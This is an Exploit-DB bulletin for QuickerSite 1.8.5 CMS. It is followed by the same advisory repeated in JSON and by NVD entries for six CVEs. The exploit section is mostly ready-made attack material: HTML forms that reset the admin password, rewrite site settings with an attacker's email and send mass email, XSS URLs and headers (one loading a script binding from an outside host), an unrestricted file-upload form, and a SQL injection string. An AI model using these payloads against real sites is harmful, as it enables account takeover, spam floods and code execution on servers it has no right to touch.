ID EDB-ID:5733 Type exploitdb Reporter BugReport.IR Modified 2008-06-03T00:00:00
Description
QuickerSite 1.8.5 Multiple Remote Vulnerabilities. CVE-2008-6673,CVE-2008-6674,CVE-2008-6675,CVE-2008-6676,CVE-2008-6677,CVE-2008-6678. Webapps exploit for p...
########################## www.BugReport.ir #######################################
#
# AmnPardaz Security Research Team
#
# Title: QuickerSite Multiple Vulnerabilities
# Vendor: www.quickersite.com
# Vulnerable Version: 1.8.5
# Exploit: Available
# Impact: High
# Fix: N/A
# Original Advisory: http://bugreport.ir/index.php?/39
###################################################################################
####################
1. Description:
####################
QuickerSite is a Content Management System for Windows Servers. It is written in ASP/VBScript with an optional pinch of ASP.NET for true image-resizing capabilities. QuickerSite ships with an Access database, with the option to upsize to SQL Server 2000/2005 for busy sites (>1000 visitors/day).
####################
2. Vulnerabilities:
####################
2.1. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can change admin password.
2.1.1. Exploit:
Check the exploit section.
2.2. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can edit all the site info., such as admin email address.
2.2.1. Exploit:
Check the exploit section.
2.3. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can edit all the site design. (Also, all the site settings can be changed by other parameters)
2.3.1. Exploit:
Check the exploit section.
2.4. Failure to Restrict URL Access [in "mailPage.asp"]. Everyone can mailbomb others.
2.4.1. Exploit:
Check the exploit section.
2.5. Cross Site Scripting (XSS) [in "showThumb.aspx"]. Reflected XSS attack by circumventing the ASP.Net XSS denier (Path disclosure on the open error mode).
2.5.1. Exploit:
Check the exploit section.
2.6. Cross Site Scripting (XSS), Failure to Restrict URL Access [in "process_send.asp"]. Redirect Reflected XSS Attack In "SB_redirect" parameter. Reflected XSS, Content Spoofing In "SB_feedback" parameter. Everyone can mailbomb others.
2.6.1. Exploit:
Check the exploit section.
2.7. Cross Site Scripting (XSS) [in "picker.asp"]. Reflected XSS attack in "paramCode" and "cColor" parameters.
2.7.1. Exploit:
Check the exploit section.
2.8. Cross Site Scripting (XSS) [in "rss.asp"]. Stored XSS attack in "X-FORWARDED-FOR","QueryString","Referer"" header parameter. Attacker can execute an XSS against Admin.
2.8.1. Exploit:
Check the exploit section.
2.9. File uploading is allowed by FCKEDITOR.
2.9.1. Exploit:
Check the exploit section.
2.10. Injection Flaws [in "/asp/includes/contact.asp"]. SQL Injection on "check" function in "sNickName" parameter.
2.10.1. Exploit:
Check the exploit section.
####################
3. Exploits:
####################
Original Exploit URL: http://bugreport.ir/index.php?/39/exploit
3.1. Everyone can change admin password.
-------------
<form action="http://[URL]/asp/bs_login.asp?btnAction=cSaveAdminPW" method="post">
adminPassword: <input type="text" name="adminPassword" value="" size="30" /><br />
adminPasswordConfirm: <input type="text" name="adminPasswordConfirm" value="" size="30" /><br />
<input type="submit" />
</form>
-------------
3.2. Everyone can edit all the site info., such as admin email address.
-------------
<form action="http://[URL]/asp/bs_login.asp?btnAction=saveAdmin" method="post">
Site Url: <input type="text" name="sUrl" value="http://www.VICTIM.com" size="100" /><br />
Site AlternateDomains: <input type="text" name="sAlternateDomains" value="http://www.VICTIM-Backup.com" size="100" /><br />
Description: <input type="text" name="sDescription" value="Hacked Description" size="100" /><br />
Site Name: <input type="text" name="siteName" value="Hacked Site Name" size="100" /><br />
Site Title: <input type="text" name="siteTitle" value="Hacked Site Title" size="100" /><br />
CopyRight: <input type="text" name="copyRight" value="Hacked CopyRight" size="100" /><br />
Keywords: <input type="text" name="keywords" value="Hacked KeyWords" size="100" /><br />
Google Analytics: <input type="text" name="googleAnalytics" value="Hacked Google Anal!" size="100" /><br />
Language: <input type="text" name="language" value="1" size="100" /><br />
DatumFormat: <input type="text" name="sDatumFormat" value="1" size="100" /><br />
Webmaster: <input type="text" name="webmaster" value="Hacker" size="100" /><br />
Webmaster Email: <input type="text" name="webmasterEmail" value="MyEmail-ResetPassword@Hacker.Com" size="100" /><br />
Default RSS Link: <input type="text" name="sDefaultRSSLink" value="http://www.VICTIM.com/RSS.asp" size="100" /><br />
<input type="submit" />
</form>
-------------
3.3. Everyone can edit all the site design.
-------------
<form action="http://[URL]/asp/bs_login.asp?btnAction=saveDesign" method="post">
siteWidth: <input type="text" name="siteWidth" value="800" size="30" /><br />
menuWidth: <input type="text" name="menuWidth" value="600" size="30" /><br />
bgColorSides: <input type="text" name="bgColorSides" value="" size="30" /><br />
bgImageLeft: <input type="text" name="bgImageLeft" value="" size="30" /><br />
bgImageRight: <input type="text" name="bgImageRight" value="" size="30" /><br />
mainBGColor: <input type="text" name="mainBGColor" value="" size="30" /><br />
mainBgImage: <input type="text" name="mainBgImage" value="" size="30" /><br />
scheidingsLijnColor: <input type="text" name="scheidingsLijnColor" value="" size="30" /><br />
scheidingsLijnWidth: <input type="text" name="scheidingsLijnWidth" value="100" size="30" /><br />
menuBGColor: <input type="text" name="menuBGColor" value="" size="30" /><br />
menuBGImage: <input type="text" name="menuBGImage" value="" size="30" /><br />
menuBorderColor: <input type="text" name="menuBorderColor" value="" size="30" /><br />
MenuHoverBGColor: <input type="text" name="MenuHoverBGColor" value="" size="30" /><br />
subMenuBorderColor: <input type="text" name="subMenuBorderColor" value="" size="30" /><br />
fontType: <input type="text" name="fontType" value="" size="30" /><br />
fontColor: <input type="text" name="fontColor" value="" size="30" /><br />
linkColor: <input type="text" name="linkColor" value="" size="30" /><br />
fontSize: <input type="text" name="fontSize" value="10" size="30" /><br />
fontWeight: <input type="text" name="fontWeight" value="10" size="30" /><br />
publicIconColor: <input type="text" name="publicIconColor" value="" size="30" /><br />
publicIconColorHover: <input type="text" name="publicIconColorHover" value="" size="30" /><br />
siteAlign: <input type="text" name="siteAlign" value="" size="30" /><br />
menuLocation: <input type="text" name="menuLocation" value="" size="30" /><br />
<input type="hidden" name="defaultTemplate" value="EEE" size="30" />
<input type="submit" />
</form>
-------------
3.4. Everyone can mailbomb others.
-------------
<form action="http://[URL]/mailPage.asp?iId=HILHG" method="post">
<input type="text" name="btnAction" value="sendPage" />
<input type="text" name="sEmail" value="" />
<input type="submit" />
</form>
-------------
3.5. Reflected XSS attack by circumventing the ASP.Net XSS denier (Path disclosure on the open error mode).
-------------
http://[URL]/showThumb.aspx?img=test.jpg&close='STYLE='IRSDL:expr/**/ession(alert("XSS")) (IE)
http://[URL]/showThumb.aspx?img=test.jpg&close='STYLE='-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22) (Mozilla)
http://[URL]/showThumb.aspx?img=test.jpg&close='STYLE='IRSDL:expr/**/ession(alert("XSS"));-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22) (IE+Mozilla)
http://[URL]/showThumb.aspx (Path disc.)
-------------
3.6. Redirect Reflected XSS Attack In "SB_redirect" parameter in "process_send.asp". Reflected XSS, Content Spoofing In "SB_feedback" parameter in "process_send.asp". Everyone can mailbomb others.
-------------
<form action="http://[URL]/default.asp?iId=HILHG&pageAction=send" method="post">
MailTo: <input type="text" name="SB_emailto" value="" size="100" /><br />
Subject: <input type="text" name="SB_subject" value="" size="100" /><br />
Messgae: <input type="text" name="Messgae" value="" size="100" /><br />
SB_feedback: <input type="text" name="SB_feedback" value="XSS" size="100" /><br />
SB_redirect: <input type="text" name="SB_redirect" value="XSS" size="100" /><br />
<input type="submit" />
</form>
-------------
3.7. Reflected XSS attack in "paramCode" and "cColor" parameters in "picker.asp"
-------------
http://[URL]/asp/colorpicker/picker.asp?paramCode=pickerPanel.value=''};alert('XSS')</script><script>
http://[URL]/asp/colorpicker/picker.asp?cColor=irsdl<script>alert('XSS')</script>
-------------
3.8. Stored XSS attack in "X-FORWARDED-FOR","QueryString","Referer"" header parameter. Attacker can execute an XSS against Admin.
-------------
Header must like this:
GET /rss.asp?iId=IHJEF&s="'><script>alert('XSS-QueryString!')</script> HTTP/1.1
Host: [URL]
User-Agent: Not
Referer: FooNotSite.com"'><script>alert('XSS-Referer!')</script>
X-FORWARDED-FOR: "'><script>alert('XSS-Proxy!')</script>
ACCEPT-LANGUAGE: test
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
-------------
3.9. File uploading is allowed by FCKEDITOR.
-------------
<form enctype="multipart/form-data" action="http://[URL]/fckeditor251/editor/filemanager/connectors/asp/upload.asp" method="post">
<input type="file" name="NewFile"><br>
<input type="submit" value="Send it to the Server">
</form>
-------------
3.10. SQL Injection on "check" function in "sNickName" parameter.
-------------
http://[URL]/default.asp?pageAction=profile
Change "Nickname" to "'or'1'='1" and "'or'1'='2" and see the results
-------------
####################
4. Solution:
####################
Edit the source code to ensure that inputs are properly sanitized for 3.5, 3.6, 3.7, 3.8, 3.10, And use access control for others.
Note: First check the vendor and look for the patch.
####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com
# milw0rm.com [2008-06-03]
{"id": "EDB-ID:5733", "hash": "5f5fc4d59ef1e7e78bf98d91b9e40f95", "type": "exploitdb", "bulletinFamily": "exploit", "title": "quickersite 1.8.5 - Multiple Vulnerabilities", "description": "QuickerSite 1.8.5 Multiple Remote Vulnerabilities. CVE-2008-6673,CVE-2008-6674,CVE-2008-6675,CVE-2008-6676,CVE-2008-6677,CVE-2008-6678. Webapps exploit for p...", "published": "2008-06-03T00:00:00", "modified": "2008-06-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5733/", "reporter": "BugReport.IR", "references": [], "cvelist": ["CVE-2008-6675", "CVE-2008-6677", "CVE-2008-6676", "CVE-2008-6673", "CVE-2008-6678", "CVE-2008-6674"], "lastseen": "2016-01-31T22:30:05", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 5.9, "vector": "NONE", "modified": "2016-01-31T22:30:05"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-6675", "CVE-2008-6674", "CVE-2008-6677", "CVE-2008-6676", "CVE-2008-6673", "CVE-2008-6678"]}], "modified": "2016-01-31T22:30:05"}, "vulnersScore": 5.9}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/5733/", "sourceData": "########################## www.BugReport.ir #######################################\n#\n# AmnPardaz Security Research Team\n#\n# Title: QuickerSite Multiple Vulnerabilities\n# Vendor: www.quickersite.com\n# Vulnerable Version: 1.8.5\n# Exploit: Available\n# Impact: High\n# Fix: N/A\n# Original Advisory: http://bugreport.ir/index.php?/39\n###################################################################################\n\n####################\n1. Description:\n####################\n QuickerSite is a Content Management System for Windows Servers. It is written in ASP/VBScript with an optional pinch of ASP.NET for true image-resizing capabilities. QuickerSite ships with an Access database, with the option to upsize to SQL Server 2000/2005 for busy sites (>1000 visitors/day).\n####################\n2. Vulnerabilities:\n####################\n 2.1. Insecure Direct Object Reference [in \"bs_login.asp\"]. Everyone can change admin password.\n 2.1.1. Exploit:\n Check the exploit section.\n 2.2. Insecure Direct Object Reference [in \"bs_login.asp\"]. Everyone can edit all the site info., such as admin email address.\n 2.2.1. Exploit:\n Check the exploit section.\n 2.3. Insecure Direct Object Reference [in \"bs_login.asp\"]. Everyone can edit all the site design. (Also, all the site settings can be changed by other parameters)\n 2.3.1. Exploit:\n Check the exploit section.\n 2.4. Failure to Restrict URL Access [in \"mailPage.asp\"]. Everyone can mailbomb others.\n 2.4.1. Exploit:\n Check the exploit section.\n 2.5. Cross Site Scripting (XSS) [in \"showThumb.aspx\"]. Reflected XSS attack by circumventing the ASP.Net XSS denier (Path disclosure on the open error mode).\n 2.5.1. Exploit:\n Check the exploit section.\n 2.6. Cross Site Scripting (XSS), Failure to Restrict URL Access [in \"process_send.asp\"]. Redirect Reflected XSS Attack In \"SB_redirect\" parameter. Reflected XSS, Content Spoofing In \"SB_feedback\" parameter. Everyone can mailbomb others.\n 2.6.1. Exploit:\n Check the exploit section.\n 2.7. Cross Site Scripting (XSS) [in \"picker.asp\"]. Reflected XSS attack in \"paramCode\" and \"cColor\" parameters.\n 2.7.1. Exploit:\n Check the exploit section.\n 2.8. Cross Site Scripting (XSS) [in \"rss.asp\"]. Stored XSS attack in \"X-FORWARDED-FOR\",\"QueryString\",\"Referer\"\" header parameter. Attacker can execute an XSS against Admin.\n 2.8.1. Exploit:\n Check the exploit section.\n 2.9. File uploading is allowed by FCKEDITOR.\n 2.9.1. Exploit:\n Check the exploit section.\n 2.10. Injection Flaws [in \"/asp/includes/contact.asp\"]. SQL Injection on \"check\" function in \"sNickName\" parameter.\n 2.10.1. Exploit:\n Check the exploit section.\n####################\n3. Exploits:\n####################\n\n Original Exploit URL: http://bugreport.ir/index.php?/39/exploit\n 3.1. Everyone can change admin password.\n -------------\n <form action=\"http://[URL]/asp/bs_login.asp?btnAction=cSaveAdminPW\" method=\"post\">\n adminPassword: <input type=\"text\" name=\"adminPassword\" value=\"\" size=\"30\" /><br />\n adminPasswordConfirm: <input type=\"text\" name=\"adminPasswordConfirm\" value=\"\" size=\"30\" /><br />\n <input type=\"submit\" />\n </form>\n -------------\n 3.2. Everyone can edit all the site info., such as admin email address.\n -------------\n <form action=\"http://[URL]/asp/bs_login.asp?btnAction=saveAdmin\" method=\"post\">\n Site Url: <input type=\"text\" name=\"sUrl\" value=\"http://www.VICTIM.com\" size=\"100\" /><br />\n Site AlternateDomains: <input type=\"text\" name=\"sAlternateDomains\" value=\"http://www.VICTIM-Backup.com\" size=\"100\" /><br />\n Description: <input type=\"text\" name=\"sDescription\" value=\"Hacked Description\" size=\"100\" /><br />\n Site Name: <input type=\"text\" name=\"siteName\" value=\"Hacked Site Name\" size=\"100\" /><br />\n Site Title: <input type=\"text\" name=\"siteTitle\" value=\"Hacked Site Title\" size=\"100\" /><br />\n CopyRight: <input type=\"text\" name=\"copyRight\" value=\"Hacked CopyRight\" size=\"100\" /><br />\n Keywords: <input type=\"text\" name=\"keywords\" value=\"Hacked KeyWords\" size=\"100\" /><br />\n Google Analytics: <input type=\"text\" name=\"googleAnalytics\" value=\"Hacked Google Anal!\" size=\"100\" /><br />\n Language: <input type=\"text\" name=\"language\" value=\"1\" size=\"100\" /><br />\n DatumFormat: <input type=\"text\" name=\"sDatumFormat\" value=\"1\" size=\"100\" /><br />\n Webmaster: <input type=\"text\" name=\"webmaster\" value=\"Hacker\" size=\"100\" /><br />\n Webmaster Email: <input type=\"text\" name=\"webmasterEmail\" value=\"MyEmail-ResetPassword@Hacker.Com\" size=\"100\" /><br />\n Default RSS Link: <input type=\"text\" name=\"sDefaultRSSLink\" value=\"http://www.VICTIM.com/RSS.asp\" size=\"100\" /><br />\n <input type=\"submit\" />\n </form>\n -------------\n 3.3. Everyone can edit all the site design.\n -------------\n <form action=\"http://[URL]/asp/bs_login.asp?btnAction=saveDesign\" method=\"post\">\n siteWidth: <input type=\"text\" name=\"siteWidth\" value=\"800\" size=\"30\" /><br />\n menuWidth: <input type=\"text\" name=\"menuWidth\" value=\"600\" size=\"30\" /><br />\n bgColorSides: <input type=\"text\" name=\"bgColorSides\" value=\"\" size=\"30\" /><br />\n bgImageLeft: <input type=\"text\" name=\"bgImageLeft\" value=\"\" size=\"30\" /><br />\n bgImageRight: <input type=\"text\" name=\"bgImageRight\" value=\"\" size=\"30\" /><br />\n mainBGColor: <input type=\"text\" name=\"mainBGColor\" value=\"\" size=\"30\" /><br />\n mainBgImage: <input type=\"text\" name=\"mainBgImage\" value=\"\" size=\"30\" /><br />\n scheidingsLijnColor: <input type=\"text\" name=\"scheidingsLijnColor\" value=\"\" size=\"30\" /><br />\n scheidingsLijnWidth: <input type=\"text\" name=\"scheidingsLijnWidth\" value=\"100\" size=\"30\" /><br />\n menuBGColor: <input type=\"text\" name=\"menuBGColor\" value=\"\" size=\"30\" /><br />\n menuBGImage: <input type=\"text\" name=\"menuBGImage\" value=\"\" size=\"30\" /><br />\n menuBorderColor: <input type=\"text\" name=\"menuBorderColor\" value=\"\" size=\"30\" /><br />\n MenuHoverBGColor: <input type=\"text\" name=\"MenuHoverBGColor\" value=\"\" size=\"30\" /><br />\n subMenuBorderColor: <input type=\"text\" name=\"subMenuBorderColor\" value=\"\" size=\"30\" /><br />\n fontType: <input type=\"text\" name=\"fontType\" value=\"\" size=\"30\" /><br />\n fontColor: <input type=\"text\" name=\"fontColor\" value=\"\" size=\"30\" /><br />\n linkColor: <input type=\"text\" name=\"linkColor\" value=\"\" size=\"30\" /><br />\n fontSize: <input type=\"text\" name=\"fontSize\" value=\"10\" size=\"30\" /><br />\n fontWeight: <input type=\"text\" name=\"fontWeight\" value=\"10\" size=\"30\" /><br />\n publicIconColor: <input type=\"text\" name=\"publicIconColor\" value=\"\" size=\"30\" /><br />\n publicIconColorHover: <input type=\"text\" name=\"publicIconColorHover\" value=\"\" size=\"30\" /><br />\n siteAlign: <input type=\"text\" name=\"siteAlign\" value=\"\" size=\"30\" /><br />\n menuLocation: <input type=\"text\" name=\"menuLocation\" value=\"\" size=\"30\" /><br />\n <input type=\"hidden\" name=\"defaultTemplate\" value=\"EEE\" size=\"30\" />\n <input type=\"submit\" />\n </form>\n -------------\n 3.4. Everyone can mailbomb others.\n -------------\n <form action=\"http://[URL]/mailPage.asp?iId=HILHG\" method=\"post\">\n <input type=\"text\" name=\"btnAction\" value=\"sendPage\" />\n <input type=\"text\" name=\"sEmail\" value=\"\" />\n <input type=\"submit\" />\n </form>\n -------------\n 3.5. Reflected XSS attack by circumventing the ASP.Net XSS denier (Path disclosure on the open error mode).\n -------------\n http://[URL]/showThumb.aspx?img=test.jpg&close='STYLE='IRSDL:expr/**/ession(alert(\"XSS\")) (IE)\n http://[URL]/showThumb.aspx?img=test.jpg&close='STYLE='-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22) (Mozilla)\n http://[URL]/showThumb.aspx?img=test.jpg&close='STYLE='IRSDL:expr/**/ession(alert(\"XSS\"));-moz-binding:url(%22http://ha.ckers.org/xssmoz.xml%23xss%22) (IE+Mozilla)\n http://[URL]/showThumb.aspx (Path disc.)\n -------------\n 3.6. Redirect Reflected XSS Attack In \"SB_redirect\" parameter in \"process_send.asp\". Reflected XSS, Content Spoofing In \"SB_feedback\" parameter in \"process_send.asp\". Everyone can mailbomb others.\n -------------\n <form action=\"http://[URL]/default.asp?iId=HILHG&pageAction=send\" method=\"post\">\n MailTo: <input type=\"text\" name=\"SB_emailto\" value=\"\" size=\"100\" /><br />\n Subject: <input type=\"text\" name=\"SB_subject\" value=\"\" size=\"100\" /><br />\n Messgae: <input type=\"text\" name=\"Messgae\" value=\"\" size=\"100\" /><br />\n SB_feedback: <input type=\"text\" name=\"SB_feedback\" value=\"XSS\" size=\"100\" /><br />\n SB_redirect: <input type=\"text\" name=\"SB_redirect\" value=\"XSS\" size=\"100\" /><br />\n <input type=\"submit\" />\n </form>\n -------------\n 3.7. Reflected XSS attack in \"paramCode\" and \"cColor\" parameters in \"picker.asp\"\n -------------\n http://[URL]/asp/colorpicker/picker.asp?paramCode=pickerPanel.value=''};alert('XSS')</script><script>\n http://[URL]/asp/colorpicker/picker.asp?cColor=irsdl<script>alert('XSS')</script>\n -------------\n 3.8. Stored XSS attack in \"X-FORWARDED-FOR\",\"QueryString\",\"Referer\"\" header parameter. Attacker can execute an XSS against Admin.\n -------------\n Header must like this:\n\n GET /rss.asp?iId=IHJEF&s=\"'><script>alert('XSS-QueryString!')</script> HTTP/1.1\n Host: [URL]\n User-Agent: Not\n Referer: FooNotSite.com\"'><script>alert('XSS-Referer!')</script>\n X-FORWARDED-FOR: \"'><script>alert('XSS-Proxy!')</script>\n ACCEPT-LANGUAGE: test\n Accept-Encoding: gzip,deflate\n Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n Keep-Alive: 300\n Proxy-Connection: keep-alive\n -------------\n 3.9. File uploading is allowed by FCKEDITOR.\n -------------\n <form enctype=\"multipart/form-data\" action=\"http://[URL]/fckeditor251/editor/filemanager/connectors/asp/upload.asp\" method=\"post\">\n <input type=\"file\" name=\"NewFile\"><br>\n <input type=\"submit\" value=\"Send it to the Server\">\n </form>\n -------------\n 3.10. SQL Injection on \"check\" function in \"sNickName\" parameter.\n -------------\n http://[URL]/default.asp?pageAction=profile\n Change \"Nickname\" to \"'or'1'='1\" and \"'or'1'='2\" and see the results\n -------------\n####################\n4. Solution:\n####################\n Edit the source code to ensure that inputs are properly sanitized for 3.5, 3.6, 3.7, 3.8, 3.10, And use access control for others.\n Note: First check the vendor and look for the patch.\n####################\n- Credit :\n####################\nAmnPardaz Security Research & Penetration Testing Group\nContact: admin[4t}bugreport{d0t]ir\nWwW.BugReport.ir\nWwW.AmnPardaz.com\n\n# milw0rm.com [2008-06-03]\n", "osvdbidlist": ["46738", "46223", "46225", "46221", "46224", "46228", "46222", "46220", "46736", "46227", "46219", "46226"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:30", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in QuickerSite 1.8.5 allow remote attackers to inject arbitrary web script or HTML via (1) the close parameter to showThumb.aspx; (2) SB_redirect and (3) SB_feedback parameters in process_send.asp, as reachable through default.asp; (4) paramCode and (5) cColor parameters to picker.asp; and the (6) query string, (7) Referer header, and (8) X-FORWARDED-FOR header to rss.asp.", "modified": "2017-08-17T01:29:00", "id": "CVE-2008-6675", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6675", "published": "2009-04-08T10:30:00", "title": "CVE-2008-6675", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:09:30", "bulletinFamily": "NVD", "description": "QuickerSite 1.8.5 allows remote attackers to obtain sensitive information via a request to showThumb.aspx without any parameters, which reveals the installation path in an error message.", "modified": "2017-08-17T01:29:00", "id": "CVE-2008-6676", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6676", "published": "2009-04-08T10:30:00", "title": "CVE-2008-6676", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:09:30", "bulletinFamily": "NVD", "description": "mailPage.asp in QuickerSite 1.8.5 allows remote attackers to flood e-mail accounts with messages via a large number of requests with a modified sEmail parameter.", "modified": "2009-04-23T05:57:00", "id": "CVE-2008-6674", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6674", "published": "2009-04-08T10:30:00", "title": "CVE-2008-6674", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:09:30", "bulletinFamily": "NVD", "description": "Unrestricted file upload vulnerability in fckeditor251/editor/filemanager/connectors/asp/upload.asp in QuickerSite 1.8.5 allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file.", "modified": "2009-04-23T05:57:00", "id": "CVE-2008-6677", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6677", "published": "2009-04-08T10:30:00", "title": "CVE-2008-6677", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:09:30", "bulletinFamily": "NVD", "description": "asp/bs_login.asp in QuickerSite 1.8.5 does not properly restrict access to administrative functionality, which allows remote attackers to (1) change the admin password via the cSaveAdminPW action; (2) modify site information, such as the contact address, via the saveAdmin; and (3) modify the site design via the saveDesign action.", "modified": "2009-04-23T05:57:00", "id": "CVE-2008-6673", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6673", "published": "2009-04-08T10:30:00", "title": "CVE-2008-6673", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:09:30", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in asp/includes/contact.asp in QuickerSite 1.8.5 allows remote attackers to execute arbitrary SQL commands via the sNickName parameter in a profile action to default.asp.", "modified": "2017-08-17T01:29:00", "id": "CVE-2008-6678", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6678", "published": "2009-04-08T10:30:00", "title": "CVE-2008-6678", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}